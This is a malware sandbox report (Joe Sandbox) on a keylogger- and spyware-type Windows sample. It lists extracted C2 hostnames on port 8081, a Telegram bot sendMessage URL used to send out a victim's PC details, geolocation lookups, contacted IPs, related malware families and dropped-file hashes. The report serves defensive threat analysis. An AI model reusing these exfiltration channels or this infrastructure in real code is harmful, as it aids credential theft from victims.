http://aborters.duckdns.org:8081	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.office.com/4	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034AC1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004498000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C29000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035982000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359AD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B26000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034A8B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034946000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003498C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003491C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003498C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C29000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035982000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359AD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B26000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003491C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.23.110	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.184.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.64.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1611020
Start date and time:	2025-02-10 12:43:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.FileRepMalware.23885.29286.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/30@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 202 Number of non-executed functions: 146
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:45:09	API Interceptor	36830x Sleep call for process: SecuriteInfo.com.FileRepMalware.23885.29286.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	https://ebukawetransfersverifys.blob.core.windows.net/ebukawetransfersverifys/ebukawetransfersverifys.html?#datenschutz@ensi.ch	Get hash	malicious	HTMLPhisher	Browse
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.6002.3636.exe	Get hash	malicious	MassLogger RAT	Browse
	https://gogolanapro.github.io/Instagram/	Get hash	malicious	HTMLPhisher	Browse
	https://s3-us-east-2.amazonaws.com/server-monitoring.files6765878970988/index.html?EMAIL=bchamblee	Get hash	malicious	HTMLPhisher	Browse
193.122.6.168	REQ.237.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	EVEefim0ZH.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	V0dbeehDy2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	8FkjrKkQz3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	MnzRNM0vLj.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	cR1YfEcBnr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	7SvlYUvaER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Y3O324n0L6.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	261bDA7yXufdbxB.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	V-sea.20625.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	K2tikqI76L.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	REQ.237.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	261bDA7yXufdbxB.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	V-sea.20625.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	K2tikqI76L.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	REQ.237.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
api.telegram.org	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	https://ebukawetransfersverifys.blob.core.windows.net/ebukawetransfersverifys/ebukawetransfersverifys.html?#datenschutz@ensi.ch	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.6002.3636.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	https://gogolanapro.github.io/Instagram/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://s3-us-east-2.amazonaws.com/server-monitoring.files6765878970988/index.html?EMAIL=bchamblee	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	261bDA7yXufdbxB.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	fp8N0KDGAqlhmkD.pif.exe	Get hash	malicious	Remcos	Browse	140.238.207.208
	REQ.237.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.6002.3636.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	132.145.36.74
	Datasheet.vbs	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
TELEGRAMRU	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	https://ebukawetransfersverifys.blob.core.windows.net/ebukawetransfersverifys/ebukawetransfersverifys.html?#datenschutz@ensi.ch	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.6002.3636.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	http://xdnaspayslterr.kobunkam.web.id/	Get hash	malicious	Unknown	Browse	149.154.164.13
	http://telegrtm.cc/apps.html	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
CLOUDFLARENETUS	[BULK] Reminder Aziz Waseem - CRIB has invited you to collaborate on Box.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://url1840.welltrainedmind.com/ls/click?upn=u001.kKlZGnEgnbTSdrRBwBbouj2OnBujftmU4-2B7tCJ2NisACCJbpBipZXNZX5ssmIZLRECm29MkMclC30ViuKJgLkMIDFjTSM6qJ7ivIzL4ZRmQuCcDH4h82WfDZQxxJqIPESRGTSTGD-2FPMzMGFJkcTzGDGaa-2FVn1-2FB4ouf1JHlr6BI-3DncCP_-2FOI-2FxWKZBS0RBubCQDq4P55UTgH0sR9367fKKO7csHv-2Bv4W2wJnqtaohOt19WXs5-2BG0s-2FVHj1StG-2FOvcxoHB0rHkLs1EfHIW8t26lXIRPW-2FVInwRMeT-2Bc0NEZqMDyaf0n117hp8-2BmzVfi8JIPFjUuB09hazbF99QROBoufbNNvo-2BVPoLImNFfDDPhPziVfJJdAgnr7y5s1vWMCcCJAVQng-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.21.2.8
	https://linkin.bio/sibiliasrl	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://www.nbcb.com.cn/download_center/grwy/rjxz/ebank/nbcbEdit.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://nopaste.net/gFFvm8SLzB	Get hash	malicious	GO Backdoor, LummaC Stealer	Browse	188.114.96.3
	Vmail_783232348.svg	Get hash	malicious	Unknown	Browse	104.21.80.1
	261bDA7yXufdbxB.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	http://url1840.welltrainedmind.com/ls/click?upn=u001.kKlZGnEgnbTSdrRBwBbouj2OnBujftmU4-2B7tCJ2NisACCJbpBipZXNZX5ssmIZLRECm29MkMclC30ViuKJgLkEayblTlWJ0Mk-2Fzpr4i8uQngxD3cNRMPAaTVajGnaYgbHHixGKVXNXWXSCKleuvxCP69o8xhkXz1aSLNGoWH2rY-3D8qfe_3XV3DdnbrMQ9shgfEVUivLnuc0-2BdV10Av8MJZHjVzfkmluZklut-2FZLccUiZYIa5TthYJd0gVpsJWEhQu28eRDinVutJswDCxeSCSEZ8i882NhfLkWdxMPI7ikjorKSzQcy0cK0V-2BYy0QuB9XnDHVBtmlAz6et4IsJNmH-2Bh77wHaE7xmdbr-2FtjYTTAdyc5RqtFHBnGH53wVjHcXNi65i0reQtpnO2IHXnqTsJqEbEzwA-3D	Get hash	malicious	Unknown	Browse	104.17.25.14
	V-sea.20625.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	teamviewer_w2xX-F1.exe	Get hash	malicious	Unknown	Browse	172.67.34.118

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	261bDA7yXufdbxB.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	V-sea.20625.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	REQ.237.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.23394.3056.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	SecuriteInfo.com.Win32.CrypterX-gen.7060.19017.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	SecuriteInfo.com.W32.AutoIt.AEN.gen.Eldorado.6002.3636.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
3b5074b1b5d032e5620f69f9f700ff0e	https://cloudserver1085.com/epcjv0bkv7a56xjd	Get hash	malicious	Unknown	Browse	149.154.167.220
	Z4qloC5J.js	Get hash	malicious	Remcos	Browse	149.154.167.220
	https://nopaste.net/gFFvm8SLzB	Get hash	malicious	GO Backdoor, LummaC Stealer	Browse	149.154.167.220
	DHL_KULI5796821_PO200000035.js	Get hash	malicious	Remcos	Browse	149.154.167.220
	Order Msg (72871SVM) dated 02102025pdf.bat.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	SIP.USTAV _ELEKTR#U0130K MALZEME #U0130STEK 10-2-25 - Kopya.doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sip.USTAV _ELEKTR#U0130K Malzeme istek10-2-25 - Kopya img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	stealercuaxmoinhat.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	seethebestthingswithbstteamworkgiven.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	DHL_KULI5796821_PO200000035.js	Get hash	malicious	Remcos	Browse	172.217.23.110 142.250.184.193
	no. 04-138-24.docx	Get hash	malicious	Unknown	Browse	172.217.23.110 142.250.184.193
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.217.23.110 142.250.184.193
	RemoRecover6.0FREEEditionUnitySetup.msi	Get hash	malicious	Unknown	Browse	172.217.23.110 142.250.184.193
	F10.ENDESA.LYGAS-A4-IDfecha100220250301202552244544231012025.MSI	Get hash	malicious	Unknown	Browse	172.217.23.110 142.250.184.193
	seethebestthingstogetbacksheisbeautifulgirl.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	172.217.23.110 142.250.184.193
	BQuCS3qKSj.exe	Get hash	malicious	ScreenConnect Tool, PureCrypter, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, zgRAT	Browse	172.217.23.110 142.250.184.193
	FMn4hy7z9k.exe	Get hash	malicious	Unknown	Browse	172.217.23.110 142.250.184.193
	Sjexg2wTo5.exe	Get hash	malicious	Unknown	Browse	172.217.23.110 142.250.184.193
	Setup.exe	Get hash	malicious	Vidar	Browse	172.217.23.110 142.250.184.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsp361A.tmp\System.dll	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	OqqrLiFWKC.exe	Get hash	malicious	Mindspark	Browse
	Factura Honorarios 2024-11-04.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	EL GINER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	u9aPQQIwhj.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	whatsappjpg.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse
	sample.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\Public\Desktop\Varda.ini

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.33197669498491
Encrypted:	false
SSDEEP:	3:U4ooQGRDWh:hooQh
MD5:	340AD700CF73B73EA2313C044D40EA9A
SHA1:	9B90CC3147D140FA936E308C2C320BDC385DA93A
SHA-256:	55A2B8F5EF1D17023FD8245E69830CC961C0CE629EDDC7AC1043C288CB3915B5
SHA-512:	4B31D10B80AE71197AC367C868569949224A4CD542BF0E9C188B816348EC8958F952525F939C827BDDC8610F268DD12E310D6D2FC99071C741B3A38E062542B4
Malicious:	false
Reputation:	low
Preview:	[Chocho240]..struct=finkulturel..

C:\Users\user\AppData\Local\Temp\Alpha.ini

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.628848957968553
Encrypted:	false
SSDEEP:	3:YOm45GXQLQIfLBJXmgxv:5TGXQkIP2I
MD5:	B895D576D6637A778B387B2FCA0F56EC
SHA1:	E78D2BE4D94673D612C16D29C330BB0C78778429
SHA-256:	BFEC1E97ED5D34825521D60B98986D1564CD159B4D1F9569EAE4C3464D2F5C47
SHA-512:	B4A771D1B517A2776BA440F79F168306C244DF1A6DE1966313157154D8D52BEAD8131B95F846C2F55C15382E04284FFFC6CF6ABF3F6FCFCB259DF2EA58D769E5
Malicious:	false
Reputation:	low
Preview:	[Current]..Ini=user32::EnumWindows(i r1 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsa3830.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.250903860294566
Encrypted:	false
SSDEEP:	3:sAAEVvjsWVYFjF84n:fLR2jT
MD5:	D4DE0EAB933EAEA20FCC7A0FBC8F259A
SHA1:	776F886CF63358662064F49513924AA1F8D32596
SHA-256:	58A06909BC19369DAA6BE9CFB1CEEB7D39547F7DDE6D51FA53295C9CB59D13E0
SHA-512:	F33F19AE60203255638B5699737737CA342D48B62DA9B462B086E284773BF9CB4BA475B8A625EDC0D519761F15866A424CACCEDD6632E2FBC08A1855B8D1A7F9
Malicious:	false
Reputation:	low
Preview:	kernel32::ReadFile(i r5, i r1, i 43081728,*i 0, i 0)i.r3

C:\Users\user\AppData\Local\Temp\nsf362B.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.0914493934217315
Encrypted:	false
SSDEEP:	3:sBa99k1NoCFOn:KankVg
MD5:	5D04A35D3950677049C7A0CF17E37125
SHA1:	CAFDD49A953864F83D387774B39B2657A253470F
SHA-256:	A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
SHA-512:	C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

C:\Users\user\AppData\Local\Temp\nsg3A73.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.256564762130954
Encrypted:	false
SSDEEP:	3:DyWgLQIfLBJXmgU:mkIP25
MD5:	F15BFDEBB2DF02D02C8491BDE1B4E9BD
SHA1:	93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
SHA-256:	C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
SHA-512:	1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
Malicious:	false
Preview:	user32::EnumWindows(i r1 ,i 0)

C:\Users\user\AppData\Local\Temp\nsj34C1.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	3.9637832956585757
Encrypted:	false
SSDEEP:	3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
MD5:	16D513397F3C1F8334E8F3E4FC49828F
SHA1:	4EE15AFCA81CA6A13AF4E38240099B730D6931F0
SHA-256:	D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
